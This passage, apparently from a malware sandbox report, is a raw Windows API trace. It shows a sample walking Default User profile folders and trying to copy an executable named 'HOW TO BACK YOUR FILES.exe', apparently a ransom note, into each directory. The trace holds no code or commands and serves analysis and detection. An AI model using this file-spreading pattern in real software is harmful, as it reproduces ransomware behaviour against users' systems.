[0066.066] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.067] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.067] GetLastError () returned 0x0 [0066.067] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.067] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.067] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.067] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.067] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0066.067] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0066.067] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.067] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.068] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.068] GetLastError () returned 0x0 [0066.068] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.068] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.068] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0066.069] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0066.069] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.069] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.069] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.069] GetLastError () returned 0x0 [0066.069] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.069] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.070] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0066.070] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0066.070] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.070] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.071] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.071] GetLastError () returned 0x0 [0066.071] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.071] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.071] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0066.071] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0066.071] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.071] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.072] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.072] GetLastError () returned 0x0 [0066.072] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.072] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.072] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0066.073] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0066.073] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.073] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.073] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.073] GetLastError () returned 0x0 [0066.073] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.073] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.074] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0066.074] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0066.074] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.074] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.074] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.075] GetLastError () returned 0x0 [0066.075] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.075] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.075] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0066.075] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0066.075] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.075] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.083] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.084] GetLastError () returned 0x0 [0066.084] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.084] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.084] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0066.084] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0066.084] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.084] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.085] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.085] GetLastError () returned 0x0 [0066.085] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.085] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.085] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0066.085] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0066.085] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.085] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.086] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.086] GetLastError () returned 0x0 [0066.086] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.086] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.087] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application 